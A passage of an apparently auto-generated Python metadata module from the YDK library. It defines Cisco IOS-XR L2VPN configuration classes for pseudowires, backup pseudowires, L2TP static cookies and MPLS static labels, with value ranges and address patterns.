'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-mpls-static-labels', REFERENCE_CLASS, 'BackupMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'backup_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for the
backup PW
''',
'backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires',
False,
[
_MetaInfoClassMember('backup-pseudowire', REFERENCE_LIST, 'BackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire',
[], [],
''' Backup pseudowire for the cross connect
''',
'backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher remote cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower remote cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Remote cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-remote-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-secondary-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes',
False,
[
_MetaInfoClassMember('l2tp-local-cookie', REFERENCE_CLASS, 'L2TpLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie',
[], [],
''' L2TP local cookie
''',
'l2tp_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-local-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP local session ID
''',
'l2tp_local_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-cookie', REFERENCE_CLASS, 'L2TpRemoteCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie',
[], [],
''' L2TP remote cookie
''',
'l2tp_remote_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP remote session ID
''',
'l2tp_remote_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-secondary-local-cookie', REFERENCE_CLASS, 'L2TpSecondaryLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
[], [],
''' L2TP secondary local cookie
''',
'l2tp_secondary_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static-attributes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire L2TPv3 static
configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Pseudowire IPv4 address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-pseudowires', REFERENCE_CLASS, 'BackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires',
[], [],
''' List of pseudowires
''',
'backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bandwidth', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Pseudowire Bandwidth
''',
'bandwidth',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static', REFERENCE_CLASS, 'L2TpStatic' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic',
[], [],
''' Pseudowire L2TPv3 static configuration
''',
'l2tp_static',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static-attributes', REFERENCE_CLASS, 'L2TpStaticAttributes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes',
[], [],
''' L2TP Static Attributes
''',
'l2tp_static_attributes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-static-labels', REFERENCE_CLASS, 'MplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels',
[], [],
''' MPLS static labels
''',
'mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', REFERENCE_UNION, 'str' , None, None,
[], [],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False, [
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
]),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'neighbor',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-mpls-static-labels', REFERENCE_CLASS, 'BackupMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'backup_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for the
backup PW
''',
'backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires',
False,
[
_MetaInfoClassMember('backup-pseudowire', REFERENCE_LIST, 'BackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire',
[], [],
''' Backup pseudowire for the cross connect
''',
'backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher remote cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower remote cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Remote cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-remote-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-secondary-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes',
False,
[
_MetaInfoClassMember('l2tp-local-cookie', REFERENCE_CLASS, 'L2TpLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie',
[], [],
''' L2TP local cookie
''',
'l2tp_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-local-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP local session ID
''',
'l2tp_local_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-cookie', REFERENCE_CLASS, 'L2TpRemoteCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie',
[], [],
''' L2TP remote cookie
''',
'l2tp_remote_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP remote session ID
''',
'l2tp_remote_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-secondary-local-cookie', REFERENCE_CLASS, 'L2TpSecondaryLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
[], [],
''' L2TP secondary local cookie
''',
'l2tp_secondary_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static-attributes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire L2TPv3 static
configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress',
False,
[
_MetaInfoClassMember('pseudowire-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Pseudowire IPv6 address. A pseudowire
can have only one address: IPv4 or IPv6
''',
'pseudowire_address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-pseudowires', REFERENCE_CLASS, 'BackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires',
[], [],
''' List of pseudowires
''',
'backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bandwidth', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Pseudowire Bandwidth
''',
'bandwidth',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static', REFERENCE_CLASS, 'L2TpStatic' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic',
[], [],
''' Pseudowire L2TPv3 static configuration
''',
'l2tp_static',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static-attributes', REFERENCE_CLASS, 'L2TpStaticAttributes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes',
[], [],
''' L2TP Static Attributes
''',
'l2tp_static_attributes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-static-labels', REFERENCE_CLASS, 'MplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels',
[], [],
''' MPLS static labels
''',
'mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', REFERENCE_UNION, 'str' , None, None,
[], [],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False, [
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
